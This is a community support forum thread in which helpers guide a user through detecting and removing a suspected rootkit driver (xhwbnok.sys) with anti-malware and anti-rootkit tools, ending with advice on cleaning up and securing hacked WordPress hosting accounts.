I have xhwbnok.sys in system

Viruses and worms
1

My computer is virused!. I have xhwbnok.sys in c:\WINDOWS\system32\drivers\ . Avast free version found it as suspicious activity but the professional edition (which i buyed special forthis) don’t report any suspicious thing. Every time i connect to the internet, services.exe start to send e-mail messages. I just buyed Avast after few years of free version. It’s a rootkit, i think
Someone from Avast?

2

Google search gave no hits on xhwbnok.sys

Boot time Avast Antivirus Scanning
http://www.digitalred.com/avast-boot-time.php

Check your computer for Malware with

MBAM http://filehippo.com/download_malwarebytes_anti_malware/
update and run quick scan, click the button “remove selected” to quarantine anything found, and restart

SAS http://filehippo.com/download_superantispyware/

Are cookies really spyware and are they dangerous?
http://www.superantispyware.com/supportfaqdisplay.html?faq=26

If anything is found other than cookies you may post the scan logs here

3

This is found by the anti-rootkit scan 8 minutes after boot, is that correct, see below ?

“A suspicious file has been detected (using a heuristic method). This may be a sign of malware infection. Please allow the file to be submitted to our virus lab for analysis.”

If so ensure that you allow it to be sent for analysis. I don’t believe that anything would be found on a boot-time scan as this suspect rootkit may not be running before windows is fully up and running.

I also believe it is a rootkit - You could also check the offending/suspect file at: VirusTotal - Multi engine on-line virus scanner and report the findings here the URL in the Address bar of the VT results page.

It is possible hooking services.exe for use in sending email, if you haven’t already done so block services.exe in your firewall (which is ?) from internet access.

4

Thank you, DavidR and Pondus, for your quick answers. And Happy New Year to you and to all of the forum users.

@Pondus
What I tried before:
sophos installed - nothing
scanned with nod32 - nothing

http://www.digitalred.com/avast-boot-time.php
I started many boot scans, avast reports that all is ok

Malwarebytes Anti-Malware: No malicious items were detected. but in a previous scan, he found:
Files Infected:
C:\Documents and Settings\LocalService\Application Data\fvgqad.dat (Malware.Trace) → No action taken.
C:\Documents and Settings\NetworkService\Application Data\fvgqad.dat (Malware.Trace) → No action taken.

RootkitRevealer find the next registry paths:

HKLM\SYSTEM\ControlSet001\Services\xhwbnok - 0 bytes, Hidden from Windows API
HKLM\SYSTEM\ControlSet003\Services\xhwbnok - 0 bytes, Hidden from Windows API

In safemode, xhwbnok is the second process loaded.

From time to time, Avast tell me that is a resident virus in memory, tell me that I can remove (but it doesn’t remove), recommend me to ignore and schedule a boot scan, but doesn’t find anything.

@DavidR, yes is correct what you say, but none of the boot scan identify something like virus or rootkit

but when i want to report the file, all the browsers are blocked on the upload page (chrome) or say that “0 bytes size received / Se ha recibido un archivo vacio”.
the file has 763.904 bytes (increasing from time to time)

5

Well the RootkitRevealer scan return on the HKLM\SYSTEM\ControlSet001\Services\xhwbnok pretty much confirms avasts suspicion. So I think that on the next detection you could allow avast to delete it.

I don’t know if the memory thing is related to the suspect rootkit detection, lets see what happens when you allow avast to delete it.

I haven’t used RootkitRevealer in a long while, but it doesn’t have a function to remove those entries so if you are confident enough you could manually remove them using regedit.

The 0-bytes received is obviously its protection trying to block anything trying to analyse or remove it.

I would run MBAM again and allow it to Remove the items detected, as they look like good detections.

6

avast cannot delete de file. I used also other programs who schedule the deleting on reboot. Nothing.
I tried to remove manually with regedit many times, but the keys cannot be accessed or deleted.
MBAM found finally:
Files Infected:
C:\WINDOWS\system32\drivers\xhwbnok.sys (Rootkit.Agent) → No action taken.
but he cannot remove it.

Thank you for your answer, DavidR, I will reinstall my system. We need a fresh start every year, right? :slight_smile:

7

There may be a process running in Task Manage that would be protecting it, which you may have to end before being able to remove. These rootkits once established can be a real pain to remove.

Before you reinstall try this anti-rootkit which the avast anti-rootkit scan is based on.
GMER see http://www.gmer.net/

8

Thank you for all, DavidR.
I updated mbam and he finally succeed to remove the rootkit on reboot.
Files Infected:
C:\WINDOWS\system32\drivers\xhwbnok.sys (Rootkit.Agent)
But the entries in registry still are there.

Thank you again,
Mugur

9

Your welcome.

If the file is truly gone, then you should be able to manually remove the registry entries (though I’m a little surprised MBAM didn’t do that too, try running it again), but you would have to take ownership (right click, Permissions, add your user name to full control) of the registry key to be able to delete it.

10

I’d like to share the probable cause of my computer infection: is about the JS:Illredir-B [Trj]. Before Christmas all my hosted accounts running wordpress was infected. All my problems begun then.
For other details, see http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ .
Now I started to disinfect my accounts:) It was a mess.

Good luck to all

11

Just cleaning up after the infection is only part of the job, as you have to ensure that you are running the latest version of wordpress as it was no doubt an old version with a vulnerability that was being exploited (or it is likely to be back).

– HACKED SITES - See http://www.scmagazineus.com/Every-36-seconds-a-website-is-infected/article/140414/.

This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. see this example of a HOSTs response to a hacked site.

We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.